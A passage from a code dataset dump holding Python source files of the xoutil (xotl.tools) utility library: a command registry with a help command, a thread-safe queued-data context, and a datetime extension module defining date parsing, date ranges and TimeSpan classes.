\"\"\"\n if cls is Command:\n if cmd is not None:\n name = cmd if isinstance(cmd, str) else command_name(cmd)\n else:\n # TODO: consider reset to None\n raise ValueError(\"missing command specification!\")\n else:\n if cmd is None:\n name = command_name(cls)\n else:\n raise ValueError(\"redundant command specification\", cls, cmd)\n Command.set_setting(\"default_command\", name)\n\n\nclass Command(ABC, metaclass=CommandMeta):\n \"\"\"Base for all commands.\"\"\"\n\n __settings__ = {\n # 'default_command' : None\n }\n __registry_cache__ = {}\n\n def __str__(self):\n return command_name(type(self))\n\n def __repr__(self):\n return \"<command: %s>\" % command_name(type(self))\n\n @staticproperty\n def registry():\n \"\"\"Obtain all registered commands.\"\"\"\n res = Command.__registry_cache__\n if not res:\n Command._settle_cache(Command)\n assert res.pop(command_name(Command), None) is None\n Command._check_help()\n return res\n\n @abstractmethod\n def run(self, args=None):\n '''Must return a valid value for \"sys.exit\"'''\n raise NotImplementedError\n\n @staticmethod\n def _settle_cache(source, recursed=None):\n \"\"\"Initialize '__registry_cache__'.\"\"\"\n from xotl.tools.names import nameof\n\n if recursed is None:\n recursed = set()\n name = nameof(source, inner=True, full=True)\n if name not in recursed:\n recursed.add(name)\n sub_commands = type.__subclasses__(source)\n virtuals = getattr(source, \"__subcommands_registry__\", ())\n sub_commands.extend(virtuals)\n cmds = getattr(source, \"__commands__\", None)\n if cmds:\n from collections import Iterable\n\n if not isinstance(cmds, Iterable):\n cmds = cmds()\n sub_commands.extend(cmds)\n if sub_commands:\n for cmd in sub_commands:\n Command._settle_cache(cmd, recursed=recursed)\n else: # Only branch commands are OK to execute\n from types import FunctionType as ValidMethodType\n\n assert isinstance(source.run, ValidMethodType), (\n \"Invalid type %r for source %r\"\n % (type(source.run).__name__, source)\n ) # noqa\n Command.__registry_cache__[command_name(source)] = source\n else:\n raise ValueError('Reused class \"%s\"!' % name)\n\n @staticmethod\n def _check_help():\n \"\"\"Check that correct help command is present.\"\"\"\n name = HELP_NAME\n hlp = Command.__registry_cache__[name]\n if hlp is not Help and not getattr(hlp, \"__overwrite__\", False):\n Command.__registry_cache__[name] = Help\n\n\nclass Help(Command):\n \"\"\"Show all commands.\n\n Define the class attribute `__order__` to sort commands in special command\n \"help\".\n\n Commands could define its help in the first line of a sequence of\n documentations until found:\n\n - command class,\n - \"run\" method,\n - definition module.\n\n This command could not be overwritten unless using the class attribute:\n\n __overwrite__ = True\n\n \"\"\"\n\n __order__ = -9999\n\n @classmethod\n def get_arg_parser(cls):\n \"\"\"This is an example on how to build local argument parser.\n\n Use class method \"get\n\n \"\"\"\n # TODO: Use 'add_subparsers' in this logic (see 'backlog.org').\n res = getattr(cls, \"_arg_parser\")\n if not res:\n from argparse import ArgumentParser\n\n res = ArgumentParser()\n cls._arg_parser = res\n return res\n\n def run(self, args=[]):\n print('The most commonly used \"%s\" commands are:' % program_name())\n cmds = Command.registry\n ordered = [(getattr(cmds[cmd], \"__order__\", 0), cmd) for cmd in cmds]\n ordered.sort()\n max_len = len(max(ordered, key=lambda x: len(x[1]))[1])\n for _, cmd in ordered:\n cmd_class = cmds[cmd]\n doc = self._strip_doc(cmd_class.__doc__)\n if not doc:\n doc = self._strip_doc(cmd_class.run.__doc__)\n if not doc:\n import sys\n\n mod_name = cmd_class.__module__\n module = sys.modules.get(mod_name, None)\n if module:\n doc = self._strip_doc(module.__doc__)\n doc = '\"%s\"' % (doc if doc else mod_name)\n else:\n doc = '\"%s\"' % mod_name\n head = \" \" * 3 + cmd + \" \" * (2 + max_len - len(cmd))\n print(head, doc)\n\n @staticmethod\n def _strip_doc(doc):\n if doc:\n doc = str(\"%s\" % doc).strip()\n return str(doc.split(\"\\n\")[0].strip(\"\"\"\"' \\t\\n\\r\"\"\"))\n else:\n return \"\"\n\n\nHELP_NAME = command_name(Help)\n\n# TODO: Create \"xotl.tools.config\" here\n\ndel abstractmethod, ABCMeta\ndel staticproperty\n" }, { "alpha_fraction": 0.5602241158485413, "alphanum_fraction": 0.5620915293693542, "avg_line_length": 25.774999618530273, "blob_id": "8db6717eaee5faf0eb19ddc28dd1c311d3f35d83", "content_id": "44e6a45e41e25d21dec48774ea36bc226499cc4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/xotl/tools/tasking/safe.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Python context with thread-safe queued data.\n\n\"\"\"\n\n\n# TODO: Optimize this by using standard threading locks\nclass SafeData:\n \"\"\"Python context with queued data.\"\"\"\n\n __slots__ = (\"queue\", \"timeout\", \"data\")\n\n def __init__(self, data, timeout=None):\n from queue import Queue\n\n self.queue = Queue(1)\n self.queue.put(data)\n self.timeout = timeout\n self.data = data\n\n def __enter__(self):\n res = self.queue.get(True, self.timeout)\n if res is self.data:\n return res\n else:\n raise RuntimeError(\"unexpected error, invalid queued data\")\n\n def __exit__(self, exc_type, exc_value, traceback):\n data = self.data\n self.queue.task_done()\n self.queue.put(data, True, self.timeout)\n return False\n" }, { "alpha_fraction": 0.5674050450325012, "alphanum_fraction": 0.5758445858955383, "avg_line_length": 30.940711975097656, "blob_id": "222130b0aa80cee2a1f03a492fa86e9e96700abe", "content_id": "43f49ae8f7bfddf5f25da15fa957bcdec72c118f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40407, "license_type": "no_license", "max_line_length": 88, "num_lines": 1265, "path": "/xotl/tools/future/datetime.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extends the standard `datetime` module.\n\n- Python's ``datetime.strftime`` doesn't handle dates previous to 1900.\n This module define classes to override `date` and `datetime` to support the\n formatting of a date through its full proleptic Gregorian date range.\n\nBased on code submitted to comp.lang.python by Andrew Dalke, copied from\nDjango and generalized.\n\nYou may use this module as a drop-in replacement of the standard library\n`datetime` module.\n\n\"\"\"\n\nfrom datetime import * # noqa\nfrom datetime import timedelta\nimport datetime as _stdlib # noqa\n\nfrom re import compile as _regex_compile\nfrom time import strftime as _time_strftime\n\nfrom enum import IntEnum\nfrom typing import Iterator, Tuple, Union # noqa\n\nfrom xotl.tools.deprecation import deprecated\n\n\nclass WEEKDAY(IntEnum):\n \"\"\"Simple constants for 'weekday' method.\"\"\"\n\n MONDAY = 0\n TUESDAY = 1\n WEDNESDAY = 2\n THURSDAY = 3\n FRIDAY = 4\n SATURDAY = 5\n SUNDAY = 6\n\n\nclass ISOWEEKDAY(IntEnum):\n \"\"\"Simple constants for 'weekday' method.\"\"\"\n\n MONDAY = 1\n TUESDAY = 2\n WEDNESDAY = 3\n THURSDAY = 4\n FRIDAY = 5\n SATURDAY = 6\n SUNDAY = 7\n\n\n@deprecated(\"plain objects\")\ndef assure(obj):\n \"\"\"Make sure that a `date` or `datetime` instance is a safe version.\n\n This is only a type checker alternative to standard library.\n\n \"\"\"\n if isinstance(obj, (date, datetime, _stdlib.time, timedelta)):\n return obj\n else:\n raise TypeError(\"Not valid type for datetime assuring: %s\" % obj)\n\n\n@deprecated(assure)\ndef new_date(d):\n \"\"\"Generate a safe date from a legacy datetime date object.\"\"\"\n return date(d.year, d.month, d.day)\n\n\n@deprecated(assure)\ndef new_datetime(d):\n \"\"\"Generate a safe datetime given a legacy date or datetime object.\"\"\"\n args = [d.year, d.month, d.day]\n if isinstance(d, datetime):\n args.extend([d.hour, d.minute, d.second, d.microsecond, d.tzinfo])\n return datetime(*args)\n\n\ndel deprecated\n\n\n# This library does not support strftime's \"%s\" or \"%y\" format strings.\n# Allowed if there's an even number of \"%\"s because they are escaped.\n_illegal_formatting = _regex_compile(br\"((^|[^%])(%%)*%[sy])\")\n\n\ndef _year_find_all(fmt, year, no_year_tuple):\n text = _time_strftime(fmt, (year,) + no_year_tuple)\n regex = _regex_compile(str(year))\n return {match.start() for match in regex.finditer(text)}\n\n\n_TD_LABELS = \"dhms\" # days, hours, minutes, seconds\n\n\ndef _strfnumber(number, format_spec=\"%0.2f\"):\n \"\"\"Convert a floating point number into string using a smart way.\n\n Used internally in strfdelta.\n\n \"\"\"\n res = format_spec % number\n if \".\" in res:\n res = res.rstrip(\"0\")\n if res.endswith(\".\"):\n res = res[:-1]\n return res\n\n\ndef strfdelta(delta):\n \"\"\"\n Format a timedelta using a smart pretty algorithm.\n\n Only two levels of values will be printed.\n\n ::\n\n >>> def t(h, m):\n ... return timedelta(hours=h, minutes=m)\n\n >>> strfdelta(t(4, 56)) == '4h 56m'\n True\n\n \"\"\"\n ss, sss = str(\"%s%s\"), str(\" %s%s\")\n if delta.days:\n days = delta.days\n delta -= timedelta(days=days)\n hours = delta.total_seconds() / 60 / 60\n res = ss % (days, _TD_LABELS[0])\n if hours >= 0.01:\n res += sss % (_strfnumber(hours), _TD_LABELS[1])\n else:\n seconds = delta.total_seconds()\n if seconds > 60:\n minutes = seconds / 60\n if minutes > 60:\n hours = int(minutes / 60)\n minutes -= hours * 60\n res = ss % (hours, _TD_LABELS[1])\n if minutes >= 0.01:\n res += sss % (_strfnumber(minutes), _TD_LABELS[2])\n else:\n minutes = int(minutes)\n seconds -= 60 * minutes\n res = ss % (minutes, _TD_LABELS[2])\n if seconds >= 0.01:\n res += sss % (_strfnumber(seconds), _TD_LABELS[3])\n else:\n res = ss % (_strfnumber(seconds, \"%0.3f\"), _TD_LABELS[3])\n return res\n\n\ndef strftime(dt, fmt):\n \"\"\"Used as `strftime` method of `date` and `datetime` redefined classes.\n\n Also could be used with standard instances.\n\n \"\"\"\n if dt.year >= 1900:\n bases = type(dt).mro()\n i = 0\n base = _strftime = type(dt).strftime\n while _strftime == base:\n aux = getattr(bases[i], \"strftime\", base)\n if aux != base:\n _strftime = aux\n else:\n i += 1\n return _strftime(dt, fmt)\n else:\n illegal_formatting = _illegal_formatting.search(fmt)\n if illegal_formatting is None:\n year = dt.year\n # For every non-leap year century, advance by 6 years to get into\n # the 28-year repeat cycle\n delta = 2000 - year\n year += 6 * (delta // 100 + delta // 400)\n year += ((2000 - year) // 28) * 28 # Move to around the year 2000\n no_year_tuple = dt.timetuple()[1:]\n sites = _year_find_all(fmt, year, no_year_tuple)\n sites &= _year_find_all(fmt, year + 28, no_year_tuple)\n res = _time_strftime(fmt, (year,) + no_year_tuple)\n syear = \"%04d\" % dt.year\n for site in sites:\n res = res[:site] + syear + res[site + 4 :]\n return res\n else:\n msg = \"strftime of dates before 1900 does not handle %s\"\n raise TypeError(msg % illegal_formatting.group(0))\n\n\ndef parse_date(value=None):\n if value:\n y, m, d = value.split(\"-\")\n return date(int(y), int(m), int(d))\n else:\n return date.today()\n\n\ndef parse_datetime(value=None):\n \"\"\"Parse a datime in format 'YYYY-MM-DD HH:MM[:SS][.MS]'.\n\n The hour-minute component is mandatory.\n\n \"\"\"\n if value:\n d, t = value.split()\n y, m, d = d.split(\"-\")\n if \".\" in t:\n moment, ms = t.split(\".\")\n else:\n moment, ms = t, \"0\"\n timing = moment.split(\":\")\n if len(timing) == 2:\n h, mn = timing\n s = 0\n elif len(timing) == 3:\n h, mn, s = timing\n else:\n raise ValueError(\"Invalid time string %r\" % t)\n return datetime(int(y), int(m), int(d), int(h), int(mn), int(s), int(ms))\n else:\n return datetime.now()\n\n\ndef get_month_first(ref=None):\n \"\"\"Given a reference date, returns the first date of the same month. If\n `ref` is not given, then uses current date as the reference.\n \"\"\"\n aux = ref or date.today()\n y, m = aux.year, aux.month\n return date(y, m, 1)\n\n\ndef get_month_last(ref=None):\n \"\"\"Given a reference date, returns the last date of the same month. If\n `ref` is not given, then uses current date as the reference.\n \"\"\"\n aux = ref or date.today()\n y, m = aux.year, aux.month\n if m == 12:\n m = 1\n y += 1\n else:\n m += 1\n return date(y, m, 1) - timedelta(1)\n\n\ndef get_next_month(ref=None, lastday=False):\n \"\"\"Get the first or last day of the *next month*.\n\n If `lastday` is False return the first date of the `next month`.\n Otherwise, return the last date.\n\n The *next month* is computed with regards to a reference date. If `ref`\n is None, take the current date as the reference.\n\n Examples:\n\n >>> get_next_month(date(2017, 1, 23))\n date(2017, 2, 1)\n\n >>> get_next_month(date(2017, 1, 23), lastday=True)\n date(2017, 2, 28)\n\n .. versionadded:: 1.7.3\n\n \"\"\"\n result = get_month_last(ref) + timedelta(days=1)\n if lastday:\n return get_month_last(result)\n else:\n return result\n\n\ndef is_full_month(start, end):\n \"\"\"Returns true if the arguments comprises a whole month.\n \"\"\"\n sd, sm, sy = start.day, start.month, start.year\n em, ey = end.month, end.year\n return (\n (sd == 1) and (sm == em) and (sy == ey) and (em != (end + timedelta(1)).month)\n )\n\n\nclass flextime(timedelta):\n @classmethod\n def parse_simple_timeformat(cls, which):\n if \"h\" in which:\n hour, rest = which.split(\"h\")\n else:\n hour, rest = 0, which\n return int(hour), int(rest), 0\n\n def __new__(cls, *args, **kwargs):\n first = None\n if args:\n first, rest = args[0], args[1:]\n _super = super().__new__\n if first and not rest and not kwargs:\n hour, minutes, seconds = cls.parse_simple_timeformat(first)\n return _super(cls, hours=hour, minutes=minutes, seconds=seconds)\n else:\n return _super(cls, *args, **kwargs)\n\n\n# TODO: Merge this with the new time span.\ndef daterange(*args):\n \"\"\"Similar to standard 'range' function, but for date objets.\n\n Returns an iterator that yields each date in the range of ``[start,\n stop)``, not including the stop.\n\n If `start` is given, it must be a date (or `datetime`) value; and in this\n case only `stop` may be an integer meaning the numbers of days to look\n ahead (or back if `stop` is negative).\n\n If only `stop` is given, `start` will be the first day of stop's month.\n\n `step`, if given, should be a non-zero integer meaning the numbers of days\n to jump from one date to the next. It defaults to ``1``. If it's positive\n then `stop` should happen after `start`, otherwise no dates will be\n yielded. If it's negative `stop` should be before `start`.\n\n As with `range`, `stop` is never included in the yielded dates.\n\n \"\"\"\n import operator\n\n # Use base classes to allow broader argument values\n from datetime import date, datetime\n\n if len(args) == 1:\n start, stop, step = None, args[0], None\n elif len(args) == 2:\n start, stop = args\n step = None\n else:\n start, stop, step = args\n if not step and step is not None:\n raise ValueError(\"Invalid step value %r\" % step)\n if not start:\n if not isinstance(stop, (date, datetime)):\n raise TypeError(\"stop must a date if start is None\")\n else:\n start = get_month_first(stop)\n else:\n if stop is not None and not isinstance(stop, (date, datetime)):\n stop = start + timedelta(days=stop)\n if step is None or step > 0:\n compare = operator.lt\n else:\n compare = operator.gt\n step = timedelta(days=(step if step else 1))\n\n # Encloses the generator so that signature validation exceptions happen\n # without needing to call next().\n def _generator():\n current = start\n while stop is None or compare(current, stop):\n yield current\n current += step\n\n return _generator()\n\n\nclass DateField:\n \"\"\"A simple descriptor for dates.\n\n Ensures that assigned values must be parseable dates and parses them.\n\n \"\"\"\n\n def __init__(self, name, nullable=False):\n self.name = name\n self.nullable = nullable\n\n def __get__(self, instance, owner):\n if instance is not None:\n res = instance.__dict__[self.name]\n return res\n else:\n return self\n\n def __set__(self, instance, value):\n if value in (None, False):\n # We regard False as None, so that working with Odoo is easier:\n # missing values in Odoo, often come as False instead of None.\n if not self.nullable:\n raise ValueError(\"Setting None to a required field\")\n else:\n value = None\n elif isinstance(value, datetime):\n value = value.date()\n elif not isinstance(value, date):\n value = parse_date(value)\n instance.__dict__[self.name] = value\n\n\nclass DateTimeField(object):\n \"\"\"A simple descriptor for datetimes.\n\n Ensures that assigned values must be parseable date or datetime and parses\n them.\n\n If `prefer_last_minute` is False when converting from date, the time\n component will be '00:00:00', if True, the time component will be\n '23:59:59'.\n\n .. versionadded:: 1.9.7\n\n \"\"\"\n\n def __init__(self, name, nullable=False, prefer_last_minute=False):\n self.name = name\n self.nullable = nullable\n self.prefer_last_minute = prefer_last_minute\n\n def __get__(self, instance, owner):\n if instance is not None:\n res = instance.__dict__[self.name]\n return res\n else:\n return self\n\n def __set__(self, instance, value):\n if value in (None, False):\n # We regard False as None, so that working with Odoo is easier:\n # missing values in Odoo, often come as False instead of None.\n if not self.nullable:\n raise ValueError(\"Setting None to a required field\")\n else:\n value = None\n elif isinstance(value, datetime):\n # needed because datetime is subclass of date, and the next\n # condition would match.\n pass\n elif isinstance(value, date):\n if not self.prefer_last_minute:\n value = datetime(value.year, value.month, value.day)\n else:\n value = datetime(value.year, value.month, value.day, 23, 59, 59)\n else:\n try:\n value = parse_datetime(value)\n except ValueError:\n value = parse_date(value)\n self.__set__(instance, value) # lazy me\n return\n instance.__dict__[self.name] = value\n\n\nclass TimeSpan:\n \"\"\"A *continuous* span of time.\n\n Time spans objects are iterable. They yield exactly two times: first the\n start date, and then the end date::\n\n >>> ts = TimeSpan('2017-08-01', '2017-09-01')\n >>> tuple(ts)\n (date(2017, 8, 1), date(2017, 9, 1))\n\n Time spans objects have two items::\n\n >>> ts[0]\n date(2017, 8, 1)\n\n >>> ts[1]\n date(2017, 9, 1)\n\n >>> ts[:]\n (date(2017, 8, 1), date(2017, 9, 1))\n\n Two time spans are equal if their start_date and end_date are equal. When\n comparing a time span with a date, the date is coerced to a time span\n (`from_date`:meth:).\n\n .. note:: Comparing time spans with date time spans `coerces the time span\n <DateTimeSpan.from_timespan>`:meth: before comparing.\n\n A time span with its `start` set to None is unbound to the past. A time\n span with its `end` set to None is unbound to the future. A time span\n that is both unbound to the past and the future contains all possible\n dates. A time span that is not unbound in any direction is\n `bound <bound>`:attr:.\n\n A bound time span is `valid`:attr: if its start date comes before its end\n date. Unbound time spans are always valid.\n\n Time spans can `intersect <__mul__>`:meth:, compared for containment of\n dates and by the subset/superset order operations (``<=``, ``>=``). In\n this regard, they represent the *set* of dates between `start` and `end`,\n inclusively.\n\n .. warning:: Time spans don't implement the union or difference operations\n expected in sets because the difference/union of two span is not\n necessarily *continuous*.\n\n \"\"\"\n\n start_date = DateField(\"start_date\", nullable=True)\n end_date = DateField(\"end_date\", nullable=True)\n\n def __init__(self, start_date=None, end_date=None):\n self.start_date = start_date\n self.end_date = end_date\n\n @classmethod\n def from_date(self, date: date) -> \"TimeSpan\":\n \"\"\"Return a new time span that covers a single `date`.\"\"\"\n return self(start_date=date, end_date=date)\n\n @property\n def past_unbound(self) -> bool:\n \"True if the time span is not bound into the past.\"\n return self.start_date is None\n\n @property\n def future_unbound(self) -> bool:\n \"True if the time span is not bound into the future.\"\n return self.end_date is None\n\n @property\n def unbound(self) -> bool:\n \"\"\"True if the time span is `unbound into the past <past_unbound>`:attr: or\n `unbount into the future <future_unbound>`:attr: or both.\n\n \"\"\"\n return self.future_unbound or self.past_unbound\n\n @property\n def bound(self) -> bool:\n \"True if the time span is not `unbound <unbound>`:attr:.\"\n return not self.unbound\n\n @property\n def valid(self) -> bool:\n \"\"\"A bound time span is valid if it starts before it ends.\n\n Unbound time spans are always valid.\n\n \"\"\"\n if self.bound:\n return self.start_date <= self.end_date\n else:\n return True\n\n def __contains__(self, other):\n # type: (date) -> bool\n \"\"\"Test date `other` is in the time span.\"\"\"\n if isinstance(other, date):\n if isinstance(other, datetime):\n other = other.date()\n if self.start_date and self.end_date:\n return self.start_date <= other <= self.end_date\n elif self.start_date:\n return self.start_date <= other\n elif self.end_date:\n return other <= self.end_date\n else:\n return True\n else:\n return False\n\n def overlaps(self, other):\n # type: (TimeSpan) -> bool\n \"\"\"Test if the time spans overlaps.\"\"\"\n return bool(self & other)\n\n def isdisjoint(self, other):\n # type: (TimeSpan) -> bool\n return not self.overlaps(other)\n\n def __le__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a superset.\"\n return (self & other) == self\n\n issubset = __le__\n\n def __lt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper superset.\"\n return self != other and self <= other\n\n def __gt__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a proper subset.\"\n return self != other and self >= other\n\n def __ge__(self, other):\n # type: (TimeSpan) -> bool\n \"True if `other` is a subset.\"\n # Notice that ge is not the opposite of lt.\n return (self & other) == other\n\n issuperset = covers = __ge__\n\n def __iter__(self):\n # type: () -> Iterator[date]\n yield self.start_date\n yield self.end_date\n\n def __getitem__(self, index):\n # type: (int) -> date\n this = tuple(self)\n return this[index]\n\n def __eq__(self, other: Union[date, \"TimeSpan\"]) -> bool: # type: ignore\n if isinstance(other, date):\n other = type(self).from_date(other)\n elif isinstance(other, DateTimeSpan):\n return other == self\n if not isinstance(other, TimeSpan):\n return NotImplemented\n return self.start_date == other.start_date and self.end_date == other.end_date\n\n def __hash__(self):\n return hash((TimeSpan, self.start_date, self.end_date))\n\n def __and__(self, other):\n # type: (TimeSpan) -> TimeSpan\n \"\"\"Get the time span that is the intersection with another time span.\n\n If two time spans don't overlap, return `EmptyTimeSpan`:data:.\n\n If `other` is not a TimeSpan we try to create one. If `other` is a\n date, we create the TimeSpan that starts and end that very day. Other\n types are passed unchanged to the constructor.\n\n When `other` is a `DateTimeSpan`:class:, convert `self` to a `date\n time span <DateTimeSpan.from_timespan>`:meth: before doing the\n intersection.\n\n \"\"\"\n from xotl.tools.infinity import Infinity\n\n if isinstance(other, _EmptyTimeSpan):\n return other\n elif isinstance(other, date):\n other = TimeSpan.from_date(other)\n elif isinstance(other, DateTimeSpan):\n return other & self\n elif not isinstance(other, TimeSpan):\n raise TypeError(\"Invalid type '%s'\" % type(other).__name__)\n start = max(self.start_date or -Infinity, other.start_date or -Infinity)\n end = min(self.end_date or Infinity, other.end_date or Infinity)\n if start <= end:\n if start is -Infinity:\n start = None\n if end is Infinity:\n end = None\n return type(self)(start, end)\n else:\n return EmptyTimeSpan\n\n __mul__ = __rmul__ = __rand__ = __and__\n\n def __bool__(self):\n return True\n\n __nonzero__ = __bool__\n\n def __len__(self):\n \"\"\"The amount of dates in the span.\n\n .. warning:: If the time span is `unbound`:attr: this method returns\n NotImplemented. This will make python complain with a\n TypeError.\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n if self.bound:\n return (self.end_date - self.start_date).days\n else:\n return NotImplemented\n\n def __lshift__(self, delta):\n \"\"\"Return the time span displaced to the past in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. note:: Delta values that don't amount to at least a day will be the\n same as 0.\n\n .. versionadded:: 1.8.2\n\n .. warning:: Python does have a boundaries for the dates it can\n represent, so displacing a TimeSpan can cause OverflowError.\n\n \"\"\"\n import numbers\n\n if isinstance(delta, numbers.Integral):\n delta = timedelta(days=delta) # noqa\n start = self.start_date - delta if self.start_date else None\n end = self.end_date - delta if self.end_date else None\n return type(self)(start, end)\n\n def __rshift__(self, delta):\n \"\"\"Return the time span displaced to the future in `delta`.\n\n :param delta: The number of days to displace. It can be either an\n integer or a `datetime.timedelta`:class:. The integer\n will be converted to ``timedelta(days=delta)``.\n\n .. note:: Delta values that don't amount to at least a day will be the\n same as 0.\n\n .. versionadded:: 1.8.2\n\n .. warning:: Python does have a boundaries for the dates it can\n represent, so displacing a TimeSpan can cause OverflowError.\n\n \"\"\"\n return self << -delta\n\n def intersection(self, *others):\n \"Return ``self [& other1 & ...]``.\"\n import operator\n from functools import reduce\n\n return reduce(operator.mul, others, self)\n\n def diff(self, other):\n # type: (TimeSpan) -> Tuple[TimeSpan, TimeSpan]\n \"\"\"Return the two time spans which (combined) contain all the dates in\n `self` which are not in `other`.\n\n Notice this method returns a tuple of exactly two items.\n\n If `other` and `self` don't overlap, return ``(self, EmptyTimeSpan)``.\n\n If ``self <= other`` is True, return the tuple with the empty time\n span in both positions.\n\n Otherwise `self` will have some dates which are not in `other`; there\n are possible three cases:\n\n a) other starts before or at self's start date; return the empty time\n span and the time span containing the dates after `other.end_date`\n up to `self.end_date`\n\n b) other ends at or after self's end date; return the dates from\n `self.start_date` up to the date before `other.start_date` and the\n empty time span.\n\n c) `other` is fully contained in `self`; return two non-empty time\n spans as in the previous cases.\n\n .. versionadded:: 1.9.7\n\n \"\"\"\n if not self & other:\n return self, EmptyTimeSpan # type: ignore\n other = self & other\n if self == other:\n return EmptyTimeSpan, EmptyTimeSpan # type: ignore\n else:\n assert self > other\n day = timedelta(days=1)\n if self.start_date == other.start_date:\n return (\n EmptyTimeSpan, # type: ignore\n TimeSpan(other.end_date + day, self.end_date),\n )\n elif self.end_date == other.end_date:\n return (\n TimeSpan(self.start_date, other.start_date - day),\n EmptyTimeSpan,\n )\n else:\n return (\n TimeSpan(self.start_date, other.start_date - day),\n TimeSpan(other.end_date + day, self.end_date),\n )\n\n def __repr__(self):\n start, end = self\n return \"TimeSpan(%r, %r)\" % (\n start.isoformat() if start else None,\n end.isoformat() if end else None,\n )\n\n __str__ = __repr__\n\n\nclass _EmptyTimeSpan:\n __slots__ = [] # no inner structure\n\n def __bool__(self):\n return False\n\n __nonzero__ = __bool__\n\n def __contains__(self, which):\n return False # I don't contain noone\n\n # The empty is equal only to itself\n def __eq__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n # We expect `self` to be a singleton, but pickle protocol 1 does\n # not warrant to call our __new__.\n return self is which\n else:\n return NotImplemented\n\n def __ne__(self, other):\n res = self == other\n if res is not NotImplemented:\n return not res\n else:\n return res\n\n # The empty set is a subset of any other set. dates are regarded as the\n # set that contains that\n def __le__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n return True\n else:\n return NotImplemented\n\n # The empty set is only a superset of itself.\n __ge__ = covers = __eq__\n\n # The empty set is a *proper* subset of any set but itself. The empty\n # set is disjoint with any other set but itself.\n __lt__ = isdisjoint = __ne__\n\n # The empty set is a *proper* superset of no one\n def __gt__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n return True\n else:\n return NotImplemented\n\n # `empty | x == empty + x == x`\n def __add__(self, which):\n if isinstance(which, (TimeSpan, date, _EmptyTimeSpan)):\n return which\n else:\n raise TypeError\n\n __or__ = __add__\n\n # `empty & x == empty * x == empty`\n def __mul__(self, other):\n if isinstance(other, (TimeSpan, date, _EmptyTimeSpan)):\n return self\n else:\n raise TypeError\n\n __and__ = __mul__\n\n def __repr__(self):\n return \"EmptyTimeSpan\"\n\n __str__ = __repr__\n\n def __new__(cls):\n res = getattr(cls, \"_instance\", None)\n if res is None:\n res = cls._instance = super().__new__(cls)\n return res\n\n def __reduce__(self):\n # So that unpickling returns the singleton\n return type(self), ()\n\n def __len__(self):\n return 0\n\n def __lshift__(self, delta):\n return self\n\n def __rshift__(self, delta):\n return self\n\n\n# I solemnly swear that EmptyTimeSpan is of type DateTimeSpan.\nEmptyTimeSpan = _EmptyTimeSpan()\n\n\n# TODO: Move this to xotl.tools.objects or somewhere else\nclass SynchronizedField(object):\n \"\"\"A synchronized descriptor.\n\n Whenever the `source` gets updated, update the second.\n\n \"\"\"\n\n def __init__(self, descriptor, setting_descriptor, set_throu_get=True):\n self.descriptor = descriptor\n self.setting_descriptor = setting_descriptor\n self.set_throu_get = set_throu_get\n\n def __get__(self, instance, owner):\n return self.descriptor.__get__(instance, owner)\n\n def __set__(self, instance, value):\n from xotl.tools.context import context\n\n self.descriptor.__set__(instance, value)\n if (SynchronizedField, self.setting_descriptor) not in context:\n with context((SynchronizedField, self.setting_descriptor)):\n if self.set_throu_get:\n value = self.__get__(instance, type(instance))\n self.setting_descriptor.__set__(instance, value)\n\n\nclass DateTimeSpan(TimeSpan):\n \"\"\"A *continuous* span of time (with datetime at each boundary).\n\n `DateTimeSpan`:class: is a minor extension of `TimeSpan`:class:, and is a\n subclass.\n\n DateTimeSpan objects are iterable. They yield exactly two datetimes:\n first the start date, and then the end date::\n\n >>> ts = DateTimeSpan('2017-08-01 11:00', '2017-09-01 23:00')\n >>> tuple(ts)\n (datetime(2017, 8, 1, 11, 0), date(2017, 9, 1, 23, 0))\n\n The API of DateTimeSpan is just the natural transformation of the API of\n `TimeSpan`:class:.\n\n The `start_date` and `end_date` attributes are interlocked with the\n `start_datetime` and `end_datetime`. By changing `start_date`, you also\n change `start_datetime` with the same date at 00:00 without tzinfo. By\n setting `start_datetime` you also update `start_date`. By setting\n `end_date` you also update `end_datetime` with the same date at 23:59:59\n without tzinfo.\n\n .. versionadded:: 1.9.7\n\n .. warning:: DateTimeSpan is provided on a provisional basis. Future\n releases can change its API or remove it completely.\n\n \"\"\"\n\n start_datetime = SynchronizedField(\n DateTimeField(\"start_datetime\", nullable=True), TimeSpan.start_date\n )\n end_datetime = SynchronizedField(\n DateTimeField(\"end_datetime\", nullable=True, prefer_last_minute=True),\n TimeSpan.end_date,\n )\n start_date = SynchronizedField(TimeSpan.start_date, start_datetime.descriptor)\n end_date = SynchronizedField(TimeSpan.end_date, end_datetime.descriptor)\n\n def __init__(self, start_datetime=None, end_datetime=None):\n # Don't call super because our fields are synchronized.\n self.start_datetime = start_datetime\n self.end_datetime = end_datetime\n\n @classmethod\n def from_datetime(self, dt):\n # type: (datetime) -> DateTimeSpan\n \"\"\"Return a new date time span that covers a single `datetime`.\n\n If `dt` is actually a date, the start_datetime will be at '00:00:00'\n and the end_datetime will be at '23:59:59'.\n\n \"\"\"\n return self(start_datetime=dt, end_datetime=dt)\n\n @classmethod\n def from_timespan(self, ts):\n # type: (TimeSpan) -> DateTimeSpan\n \"\"\"Return a new date time span from a timespan.\n\n Notice the start datetime will be set at '00:00:00' and the end\n datetime at '23:59:59'.\n\n If `ts` is already a DateTimeSpan, return it unchanged.\n\n 